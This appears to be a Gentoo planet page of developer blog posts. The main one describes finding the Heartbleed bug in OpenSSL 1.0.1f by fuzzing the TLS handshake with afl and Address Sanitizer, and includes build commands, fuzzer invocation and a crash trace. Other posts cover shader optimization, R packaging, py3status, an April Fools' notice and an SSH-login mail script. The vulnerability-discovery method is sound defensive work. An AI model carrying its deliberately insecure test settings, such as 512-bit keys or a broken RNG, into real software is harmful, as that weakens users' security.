Fuzzing is a widely used strategy to find security issues and bugs in software. The basic idea is simple: Give the software lots of inputs with small errors and see what happens. If the software crashes you likely found a bug.

When buffer overflows happen an application doesn't always crash. Often it will just read (or write if it is a write overflow) to the memory that happens to be there. Whether it crashes depends on a lot of circumstances. Most of the time read overflows won't crash your application. That's also the case with Heartbleed. There are a couple of technologies that improve the detection of memory access errors like buffer overflows. An old and well-known one is the debugging tool Valgrind. However Valgrind slows down applications a lot (around 20 times slower), so it is not really well suited for fuzzing, where you want to run an application millions of times on different inputs.

Address Sanitizer finds more bug

A better tool for our purpose is Address Sanitizer. David A. Wheeler calls it “nothing short of amazing”, and I want to reiterate that. I think it should be a tool that every C/C++ software developer should know and should use for testing.

Address Sanitizer is part of the C compiler and has been included into the two most common compilers in the free software world, gcc and llvm. To use Address Sanitizer one has to recompile the software with the command line parameter -fsanitize=address . It slows down applications, but only by a relatively small amount. According to their own numbers an application using Address Sanitizer is around 1.8 times slower. This makes it feasible for fuzzing tasks.

For the fuzzing itself a tool that recently gained a lot of popularity is american fuzzy lop (afl). This was developed by Michal Zalewski from the Google security team, who is also known by his nick name lcamtuf. As far as I'm aware the approach of afl is unique. It adds instructions to an application during the compilation that allow the fuzzer to detect new code paths while running the fuzzing tasks. If a new interesting code path is found then the sample that created this code path is used as the starting point for further fuzzing.

Currently afl only uses file inputs and cannot directly fuzz network input. OpenSSL has a command line tool that allows all kinds of file inputs, so you can use it for example to fuzz the certificate parser. But this approach does not allow us to directly fuzz the TLS connection, because that only happens on the network layer. By fuzzing various file inputs I recently found two issues in OpenSSL, but both had been found by Brian Carpenter before, who at the same time was also fuzzing OpenSSL.

Let OpenSSL talk to itself

So to fuzz the TLS network connection I had to create a workaround. I wrote a small application that creates two instances of OpenSSL that talk to each other. This application doesn't do any real networking, it is just passing buffers back and forth and thus doing a TLS handshake between a server and a client. Each message packet is written down to a file. It will result in six files, but the last two are just empty, because at that point the handshake is finished and no more data is transmitted. So we have four files that contain actual data from a TLS handshake. If you want to dig into this, a good description of a TLS handshake is provided by the developers of OCaml-TLS and MirageOS.

Then I added the possibility of switching out parts of the handshake messages by files I pass on the command line. By calling my test application selftls with a number and a filename a handshake message gets replaced by this file. So to test just the first part of the server handshake I'd call the test application, take the output file packed-1 and pass it back again to the application by running selftls 1 packet-1. Now we have all the pieces we need to use american fuzzy lop and fuzz the TLS handshake.

I compiled OpenSSL 1.0.1f, the last version that was vulnerable to Heartbleed, with american fuzzy lop. This can be done by calling ./config and then replacing gcc in the Makefile with afl-gcc. Also we want to use Address Sanitizer, to do so we have to set the environment variable AFL_USE_ASAN to 1.

There are some issues when using Address Sanitizer with american fuzzy lop. Address Sanitizer needs a lot of virtual memory (many Terabytes). American fuzzy lop limits the amount of memory an application may use. It is not trivially possible to only limit the real amount of memory an application uses and not the virtual amount, therefore american fuzzy lop cannot handle this flawlessly. Different solutions for this problem have been proposed and are currently developed. I usually go with the simplest solution: I just disable the memory limit of afl (parameter -m -1). This poses a small risk: A fuzzed input may lead an application to a state where it will use all available memory and thereby will cause other applications on the same system to malfuction. Based on my experience this is very rare, so I usually just ignore that potential problem.

After having compiled OpenSSL 1.0.1f we have two files libssl.a and libcrypto.a. These are static versions of OpenSSL and we will use them for our test application. We now also use the afl-gcc to compile our test application:

AFL_USE_ASAN=1 afl-gcc selftls.c -o selftls libssl.a libcrypto.a -ldl

Now we run the application. It needs a dummy certificate. I have put one in the repo. To make things faster I'm using a 512 bit RSA key. This is completely insecure, but as we don't want any security here – we just want to find bugs – this is fine, because a smaller key makes things faster. However if you want to try fuzzing the latest OpenSSL development code you need to create a larger key, because it'll refuse to accept such small keys.

The application will give us six packet files, however the last two will be empty. We only want to fuzz the very first step of the handshake, so we're interested in the first packet. We will create an input directory for american fuzzy lop called in and place packet-1 in it. Then we can run our fuzzing job:

afl-fuzz -i in -o out -m -1 -t 5000 ./selftls 1 @@

american fuzzy lop screenshot

We pass the input and output directory, disable the memory limit and increase the timeout value, because TLS handshakes are slower than common fuzzing tasks. On my test machine around 6 hours later afl found the first crash. Now we can manually pass our output to the test application and will get a stack trace by Address Sanitizer:

==2268==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x629000013748 at pc 0x7f228f5f0cfa bp 0x7fffe8dbd590 sp 0x7fffe8dbcd38
READ of size 32768 at 0x629000013748 thread T0
#0 0x7f228f5f0cf9 (/usr/lib/gcc/x86_64-pc-linux-gnu/4.9.2/libasan.so.1+0x2fcf9)
#1 0x43d075 in memcpy /usr/include/bits/string3.h:51
#2 0x43d075 in tls1_process_heartbeat /home/hanno/code/openssl-fuzz/tests/openssl-1.0.1f/ssl/t1_lib.c:2586
#3 0x50e498 in ssl3_read_bytes /home/hanno/code/openssl-fuzz/tests/openssl-1.0.1f/ssl/s3_pkt.c:1092
#4 0x51895c in ssl3_get_message /home/hanno/code/openssl-fuzz/tests/openssl-1.0.1f/ssl/s3_both.c:457
#5 0x4ad90b in ssl3_get_client_hello /home/hanno/code/openssl-fuzz/tests/openssl-1.0.1f/ssl/s3_srvr.c:941
#6 0x4c831a in ssl3_accept /home/hanno/code/openssl-fuzz/tests/openssl-1.0.1f/ssl/s3_srvr.c:357
#7 0x412431 in main /home/hanno/code/openssl-fuzz/tests/openssl-1.0.1f/selfs.c:85
#8 0x7f228f03ff9f in __libc_start_main (/lib64/libc.so.6+0x1ff9f)
#9 0x4252a1 (/data/openssl/openssl-handshake/openssl-1.0.1f-nobreakrng-afl-asan-fuzz/selfs+0x4252a1)

0x629000013748 is located 0 bytes to the right of 17736-byte region [0x62900000f200,0x629000013748)
allocated by thread T0 here:
#0 0x7f228f6186f7 in malloc (/usr/lib/gcc/x86_64-pc-linux-gnu/4.9.2/libasan.so.1+0x576f7)
#1 0x57f026 in CRYPTO_malloc /home/hanno/code/openssl-fuzz/tests/openssl-1.0.1f/crypto/mem.c:308


We can see here that the crash is a heap buffer overflow doing an invalid read access of around 32 Kilobytes in the function tls1_process_heartbeat(). It is the Heartbleed bug. We found it.

I want to mention a couple of things that I found out while trying this. I did some things that I thought were necessary, but later it turned out that they weren't. After Heartbleed broke the news a number of reports stated that Heartbleed was partly the fault of OpenSSL's memory management. A mail by Theo De Raadt claiming that OpenSSL has “exploit mitigation countermeasures” was widely quoted. I was aware of that, so I first tried to compile OpenSSL without its own memory management. That can be done by calling ./config with the option no-buf-freelist.

But it turns out although OpenSSL uses its own memory management that doesn't defeat Address Sanitizer. I could replicate my fuzzing finding with OpenSSL compiled with its default options. Although it does its own allocation management, it will still do a call to the system's normal malloc() function for every new memory allocation. A blog post by Chris Rohlf digs into the details of the OpenSSL memory allocator.

Breaking random numbers for deterministic behaviour

When fuzzing the TLS handshake american fuzzy lop will report a red number counting variable runs of the application. The reason for that is that a TLS handshake uses random numbers to create the master secret that's later used to derive cryptographic keys. Also the RSA functions will use random numbers. I wrote a patch to OpenSSL to deliberately break the random number generator and let it only output ones (it didn't work with zeros, because OpenSSL will wait for non-zero random numbers in the RSA function).

During my tests this had no noticeable impact on the time it took afl to find Heartbleed. Still I think it is a good idea to remove nondeterministic behavior when fuzzing cryptographic applications. Later in the handshake there are also timestamps used, this can be circumvented with libfaketime, but for the initial handshake processing that I fuzzed to find Heartbleed that doesn't matter.

Conclusion

You may ask now what the point of all this is. Of course we already know where Heartbleed is, it has been patched, fixes have been deployed and it is mostly history. It's been analyzed thoroughly.

The question has been asked if Heartbleed could've been found by fuzzing. I'm confident to say the answer is yes. One thing I should mention here however: American fuzzy lop was already available back then, but it was barely known. It only received major attention later in 2014, after Michal Zalewski used it to find two variants of the Shellshock bug. Earlier versions of afl were much less handy to use, e. g. they didn't have 64 bit support out of the box. I remember that I failed to use an earlier version of afl with Address Sanitizer, it was only possible after a couple of issues were fixed. A lot of other things have been improved in afl, so at the time Heartbleed was found american fuzzy lop probably wasn't in a state that would've allowed to find it in an easy, straightforward way.

I think the takeaway message is this: We have powerful tools freely available that are capable of finding bugs like Heartbleed. We should use them and look for the other Heartbleeds that are still lingering in our software. Take a look at the Fuzzing Project if you're interested in further fuzzing work. There are beginner tutorials that I wrote with the idea in mind to show people that fuzzing is an easy way to find bugs and improve software quality.

I already used my sample application to fuzz the latest OpenSSL code. Nothing was found yet, but of course this could be further tweaked by trying different protocol versions, extensions and other variations in the handshake.

I also wrote a German article about this finding for the IT news webpage Golem.de.

Update:

I want to point out some feedback I got that I think is noteworthy.

On Twitter it was mentioned that Codenomicon actually found Heartbleed via fuzzing. There's a Youtube video from Codenomicon's Antti Karjalainen explaining the details. However the way they did this was quite different, they built a protocol specific fuzzer. The remarkable feature of afl is that it is very powerful without knowing anything specific about the used protocol. Also it should be noted that Heartbleed was found twice, the first one was Neel Mehta from Google.

Kostya Serebryany mailed me that he was able to replicate my findings with his own fuzzer which is part of LLVM, and it was even faster.

In the comments Michele Spagnuolo mentions that by compiling OpenSSL with -DOPENSSL_TLS_SECURITY_LEVEL=0 one can use very short and insecure RSA keys even in the latest version. Of course this shouldn't be done in production, but it is helpful for fuzzing and other testing efforts.

Matt Turner a.k.a. mattst88 (homepage, bugs)
Combining constants in i965 fragment shaders (April 07, 2015, 04:00 UTC)

On Intel's Gen graphics, three source instructions like MAD and LRP cannot have constants as arguments. When support for MAD instructions was introduced with Sandybridge, we assumed the choice between a MOV+MAD and a MUL+ADD sequence was inconsequential, so we chose to perform the multiply and add operations separately. Revisiting that assumption has uncovered some interesting things about the hardware and has lead us to some pretty nice performance improvements.

On Gen 7 hardware (Ivybridge, Haswell, Baytrail), multiplies and adds without immediate value arguments can be co-issued, meaning that multiple instructions can be issued from the same execution unit in the same cycle. MADs, never having immediates as sources, can always be co-issued. Considering that, we should prefer MADs, but a typical vec4 * vec4 + vec4(constant) pattern would lead to three duplicate (four total) MOV imm instructions.

mov(8)  g10<1>F    1.0F
mov(8)  g11<1>F    1.0F
mov(8)  g12<1>F    1.0F
mov(8)  g13<1>F    1.0F
mad(8)  g40<1>F    g10<8,8,1>F   g20<8,8,1>F   g30<8,8,1>F
mad(8)  g41<1>F    g11<8,8,1>F   g21<8,8,1>F   g31<8,8,1>F
mad(8)  g42<1>F    g12<8,8,1>F   g22<8,8,1>F   g32<8,8,1>F
mad(8)  g43<1>F    g13<8,8,1>F   g23<8,8,1>F   g33<8,8,1>F

Should be easy to clean up, right? We should simply combine those 1.0F MOVs and modify the MAD instructions to access the same register. Well, conceptually yes, but in practice not quite.

Since the i965 driver's fragment shader backend doesn't use static single assignment form (it's on our TODO list), our common subexpression elimination pass has to emit a MOV instruction when combining instructions. As a result, performing common subexpression elimination on immediate MOVs would undo constant propagation and the compiler's optimizer would go into an infinite loop. Not what you wanted.

Instead, I wrote a pass that scans the instruction list after the main optimization loop and creates a list of immediate values that are used. If an immediate value is used by a 3-source instruction (a MAD or a LRP) or at least four times by an instruction that can co-issue (ADD, MUL, CMP, MOV) then it's put into a register and sourced from there.

But there's still room for improvement. Each general register can store 8 floats, and instead of storing 8 separate constants in each, we're storing a single constant 8 times (and on SIMD16, 16 times!). Fixing that wasn't hard, and it significantly reduces register usage - we now only use one register for each 8 immediate values. Using a special vector-float immediate type we can even load four floating-point values in a single instruction.

With that in place, we can now always emit MAD instructions.

I'm pretty pleased with the results. Without using the New Intermediate Representation (NIR), the shader-db results are:

total instructions in shared programs: 5895414 -> 5747578 (-2.51%)
instructions in affected programs:     3618111 -> 3470275 (-4.09%)

And with NIR (that already unconditionally emits MAD instructions):

total instructions in shared programs: 7992936 -> 7772474 (-2.76%)
instructions in affected programs:     3738730 -> 3518268 (-5.90%)

Effects on a WebGL microbenchmark

In December, I checked what effect my constant combining pass would have on a WebGL procedural noise demo. The demo generates an effect ("noise") that looks like a ball of fire. Its fragment shader contains a ton of instructions but no texturing operations. We're currently able to compile the program in SIMD8 without spilling any registers, but at a cost of scheduling the instructions very badly.

Noise Demo in action

The effects the constant combining pass has on this demo are really interesting, and it actually gives me evidence that some of the ideas I had for the pass are valid, namely that co-issuing instructions is worth a little extra register pressure.

  1. 1.00x FPS of baseline - 3123 instructions - baseline
  2. 1.09x FPS of baseline - 2841 instructions - after promoting constants only if used by more than 2 MADs

Going from no-constant-combining to restricted-constant-combining gives us a 9% increase in frames per second for a 9% instruction count reduction. We're totally limited by fragment shader performance.

  1. 1.46x FPS of baseline - 2841 instructions - after promote any constant used by a MAD

Going from step 2 to 3 though is interesting. The instruction count doesn't change, but we reduced register pressure sufficiently that we can now schedule instructions better without spilling (SCHEDULE_PRE, instead of SCHEDULE_PRE_NON_LIFO) - a 33% speed up just by rearranging instructions.

  1. 1.62x FPS of baseline - 2852 instructions - after promoting constants used by at least 4 co-issueable instructions

I was worried that we weren't going to be able to measure any performance difference from pulling constants out of co-issueable instructions, but we can definitely get a nice improvement here, of about 10% increase in frames per second.

As an aside, I did an experiment to see what would happen if we used SCHEDULE_PRE and spilled registers anyway (I added a couple of extra instructions to increase register pressure over the threshold). I changed the window size to 2048x2048 and rendered a fixed number of frames.

  • SCHEDULE_PRE with no spills: 17.5 seconds
  • SCHEDULE_PRE with 4 spills (8 send instructions): 17.5 seconds
  • SCHEDULE_PRE_NON_LIFO with no spills: 28 seconds

So there's some good evidence that the cure is worse than the disease. Of course this demo doesn't do any texturing, so memory bandwidth is not at a premium.

  1. 1.76x FPS of baseline - 2609 instructions - ???

I ran the demo to see if we'd made any changes in the last two months and was pleasantly surprised to find that we'd cut another 9% of instructions. I have no idea what caused it, but I'll take it! Combined with everything else, we're up to a 76% performance improvement.

Where's the code

The Mesa patches that implement the constant combining pass were committed (commit bb33a31c) and will be in the next major release (presumably version 10.6).

If any of this sounds interesting enough that you'd like to do it for a living, feel free to contact me. My team at Intel is responsible for the open source 3D driver in Mesa and is looking for new talent.

April 05, 2015
Denis Dupeyron a.k.a. calchan (homepage, bugs)

Here’s a bug and my response to it which both deserve a little bit more visibility than being buried under some random bug number. I’m actually surprised nobody complained about that before.

GNU R supports to run
> install.packages(‘ggplot2′)
in the R console as user. The library ggplot2 will then be installed in users home. Most distros like debian and the like provide a package per library.

First, thank you for pointing out that it is possible to install and maintain your own packages in your $HOME. It didn’t use to work, and the reason why it now does is a little further down but I will not spoil it.

Here’s my response:

Please, do not ever add R packages to the tree. There are thousands of them and they are mostly very badly written, to be polite. If you look at other distros you will see that they give an illusion of having some R packages, but almost all of them (if not all) are seriously lagging behind their respective upstream or simply unmaintained. The reason is that it’s a massive amount of very frustrating and pointless work.

Upstream recommends maintaining your packages yourself in your $HOME and we’ll go with that. I have sent patches a couple of years ago to fix the way this works, and now (as you can obviously see) it does work correctly on all distros, not just Gentoo. Also, real scientists usually like to lock down the exact versions of packages they use, which is not possible when they are maintained by a third party.

If you want to live on the edge then feel free to ask Benda Xu (heroxbd) for an access to the R overlay repository. It serves tens of thousands of ebuilds for R packages automatically converted from a number of sources. It mostly works, and helps in preserving a seemingly low but nonetheless functional level of mental sanity of your beloved volunteer developers.

That, or you maintain your own overlay of packages and have it added to layman.

While we are on that subject, I would like to publicly thank André Erdmann for the fantastic work he has done over the past few years. He wrote, and still occasionally updates, the magical software which runs behind the R overlay server. Thank you, André.

March 31, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)

It’s 4:17 if you would like to skip the first prime number based slam. No more math after. Though, you may miss something.


Alexys Jacob a.k.a. ultrabug (homepage, bugs)
py3status v2.4 (March 31, 2015, 13:53 UTC)

I’m very pleased to announce this new release of py3status because it is by far the most contributed one with a total of 33 files changed, 1625 insertions and 509 deletions !

I’ll start by thanking this release’s contributors with a special mention for Federico Ceratto for his precious insights, his CLI idea and implementation and other modules contributions.

Thank you

  • Federico Ceratto
  • @rixx (and her amazing reactivity)
  • J.M. Dana
  • @Gamonics
  • @guilbep
  • @lujeni
  • @obb
  • @shankargopal
  • @thomas-

IMPORTANT

In order to keep a clean and efficient code base, this is the last version of py3status supporting the legacy modules loading and ordering, this behavior will be dropped on the next 2.5 version !

CLI commands

py3status now supports some CLI commands which allows you to get information about all the available modules and their documentation.

  • list all available modules

if you specify your own inclusion folder(s) with the -i parameter, your modules will be listed too !

$ py3status modules list
Available modules:
  battery_level          Display the battery level.
  bitcoin_price          Display bitcoin prices using bitcoincharts.com.
  bluetooth              Display bluetooth status.
  clementine             Display the current "artist - title" playing in Clementine.
  dpms                   Activate or deactivate DPMS and screen blanking.
  glpi                   Display the total number of open tickets from GLPI.
  imap                   Display the unread messages count from your IMAP account.
  keyboard_layout        Display the current keyboard layout.
  mpd_status             Display information from mpd.
  net_rate               Display the current network transfer rate.
  netdata                Display network speed and bandwidth usage.
  ns_checker             Display DNS resolution success on a configured domain.
  online_status          Display if a connection to the internet is established.
  pingdom                Display the latest response time of the configured Pingdom checks.
  player_control         Control music/video players.
  pomodoro               Display and control a Pomodoro countdown.
  scratchpad_counter     Display the amount of windows in your i3 scratchpad.
  spaceapi               Display if your favorite hackerspace is open or not.
  spotify                Display information about the current song playing on Spotify.
  sysdata                Display system RAM and CPU utilization.
  vnstat                 Display vnstat statistics.
  weather_yahoo          Display Yahoo! Weather forecast as icons.
  whoami                 Display the currently logged in user.
  window_title           Display the current window title.
  xrandr                 Control your screen(s) layout easily.
  • get available modules details and configuration
$ py3status modules details
Available modules:
  battery_level          Display the battery level.
                         
                         Configuration parameters:
                             - color_* : None means - get it from i3status config
                             - format : text with "text" mode. percentage with % replaces {}
                             - hide_when_full : hide any information when battery is fully charged
                             - mode : for primitive-one-char bar, or "text" for text percentage ouput
                         
                         Requires:
                             - the 'acpi' command line
                         
                         @author shadowprince, AdamBSteele
                         @license Eclipse Public License
                         ---
[...]

Modules changelog

  • new bluetooth module by J.M. Dana
  • new online_status module by @obb
  • new player_control module, by Federico Ceratto
  • new spotify module, by Pierre Guilbert
  • new xrandr module to handle your screens layout from your bar
  • dpms module activate/deactivate the screensaver as well
  • imap module various configuration and optimizations
  • pomodoro module can use DBUS notify, play sounds and be paused
  • spaceapi module bugfix for space APIs without ‘lastchange’ field
  • keyboard_layout module incorrect parsing of “setxkbmap -query”
  • battery_level module better python3 compatibility

Other highlights

Full changelog here.

  • catch daylight savings time change
  • ensure modules methods are always iterated alphabetically
  • refactor default config file detection
  • rename and move the empty_class example module to the doc/ folder
  • remove obsolete i3bar_click_events module
  • py3status will soon be available on debian thx to Federico Ceratto !

Thank you for participating in Gentoo’s 2015 April Fools’ joke!

Now that April 1 has passed, we shed a tear as we say goodbye CGA Web™ but also to our website. Our previous website, that is, that has been with us for more than a decade. Until all contents are migrated, you can find the previous version on wwwold.gentoo.org, please note that the contents found there are not maintained any longer.

As this is indeed a major change, we’re still working out some rough edges and would appreciate your feedback via email to www@gentoo.org or on IRC in #gentoo-www.

We hope you appreciate the new look and had a great time finding out how terrible you are at Pong and are looking forward to seeing your reactions once again when we celebrate the launch of the new Gentoo Disk™ set.

As for Alex, Robin, and all co-conspirators, thank you again for your participation!

The original April 1 news item is still available on the single news display page.


Old April Fools’ day announcement

Gentoo Linux today announced the launch of its new totally revamped and more inclusive website which was built to conform to the CGA Web™ graphics standards.

“Our previous website served the community superbly well for the past 10 years but was frankly not as inclusive as we would have liked as it could not be viewed by aspiring community members who did not have access to the latest hardware,” said a Gentoo Linux Council Member who asked not to be named.

“Dedicated community members worked all hours for many months to get the new site ready for its launch today. We are proud of their efforts and are convinced that the new site will be way more inclusive than ever and thereby deepen the sense of community felt by all,” they said.

“Gentoo Linux’s seven-person council determined that the interests of the community were not being served by the previous site and decided that it had to be made more inclusive,” said Web project lead Alex Legler (a3li). The new site is was also available via Gopher (gopher://gopher.gentoo.org/).

“What’s the use of putting millions of colours out there when so many in the world cannot appreciate them and who, indeed, may even feel disappointed by their less capable hardware platforms,” he said.

“We accept that members in more fortunate circumstances may feel that a site with a 16-colour palette and an optimal screen resolution of 640 x 200 pixels is not the best fit for their needs but we urge such members to keep the greater good in mind. The vast majority of potential new Gentoo Linux users are still using IBM XT computers, storing their information on 5.25-inch floppy disks and communicating via dial-up BBS,” said Roy Bamford (neddyseagoon), a Foundation trustee.

“These people will be touched and grateful that their needs are now being taken in account and that they will be able to view the Gentoo Linux site comfortably on whatever hardware they have available.”

“The explosion of gratitude will ensure other leading firms such as Microsoft and Apple begin to move into conformance with CGA Web™ and it is hoped it will help bring knowledge to more and more informationally-disadvantaged people every year,” said Daniel Robbins (drobbins), former Gentoo founder.

Several teams participated in the early development of the new website and would like to showcase their work:

  • Games Team (JavaScript Pong)
  • Multimedia Team (Ghostbusters Theme on 6 floppy drives)
  • Net-News Team (A list of Gentoo newsgroups)

Phase II

The second phase of the project to get Gentoo Linux to a wider user base will involve the creation of floppy disk sets containing a compact version of the operating system and a selection of software essentials. It is estimated that sets could be created using less than 700 disks each and sponsorship is currently being sought. The launch of Gentoo Disk™ can be expected in about a year.

Media release prepared by A Jackson.

Editorial inquiries: PR team.

Interviews, photography and screen shots available on request.

March 30, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)

I found

Send email on SSH login using PAM

to be a great guide for setting up e-mail delivery for any successful log-in through SSH.

My current script:

#! /bin/bash
if [ "$PAM_TYPE" != "open_session" ]; then
  exit 0
fi

cat <<-BODY | mailx -s "Log-in to ${PAM_USER:-???}@$(hostname -f) \
(${PAM_SERVICE:-???}) detected" mail@example.org
        # $(LC_ALL=C date +'%Y-%m-%d %H:%M (UTC%z)')
        $(env | grep '^PAM_' | sort)
BODY

exit 0

March 26, 2015
Alex Legler a.k.a. a3li (homepage, bugs)
On Secunia’s Vulnerability Review 2015 (March 26, 2015, 19:44 UTC)

Today, Secunia have released their Vulnerability Review 2015, including various statistics on security issues fixed in the last year.

If you don’t know about Secunia’s services: They aggregate security issues from various sources into a single stream, or as they call it: they provide vulnerability intelligence.
In the past, this intelligence was available to anyone in a free newsletter or on their website. Recent changes however caused much of the useful information to go behind login and/or pay walls. This circumstance has also forced us at the Gentoo Security team to cease using their reports as references when initiating package updates due to security issues.

Coming back to their recently published document, there is one statistic that is of particular interest: Gentoo is listed as having the third largest number of vulnerabilities in a product in 2014.

from Secunia: Secunia Vulnerability Review 2015 (http://secunia.com/resources/reports/vr2015/)from Secunia: Secunia Vulnerability Review 2015
(http://secunia.com/resources/reports/vr2015/)

Looking at the whole table, you’d expect at least one other Linux distribution with a similarly large pool of available packages, but you won’t find any.

So is Gentoo less secure than other distros? tl;dr: No.

As Secunia’s website does not let me see the actual “vulnerabilities” they have counted for Gentoo in 2014, there’s no way to actually find out how these numbers came into place. What I can see though are “Secunia advisories” which seem to be issued more or less for every GLSA we send. Comparing the number of posted Secunia advisories for Gentoo to those available for Debian 6 and 7 tells me something is rotten in the state of Denmark (scnr):
While there were 203 Secunia advisories posted for Gentoo in the last year, Debian 6 and 7 had 304, yet Debian would have to have fixed less than 105 vulnerabilities in (55+249=) 304 advisories to be at least rank 21 and thus not included in the table above. That doesn’t make much sense. Maybe issues in Gentoo’s packages are counted for the distribution as well—no idea.

That aside, 2014 was a good year in terms of security for Gentoo: The huge backlog of issues waiting for an advisory was heavily reduced as our awesome team managed to clean up old issues and make them known to glsa-check in three wrap-up advisories—and then we also issued 239 others, more than ever since 2007. Thanks to everyone involved!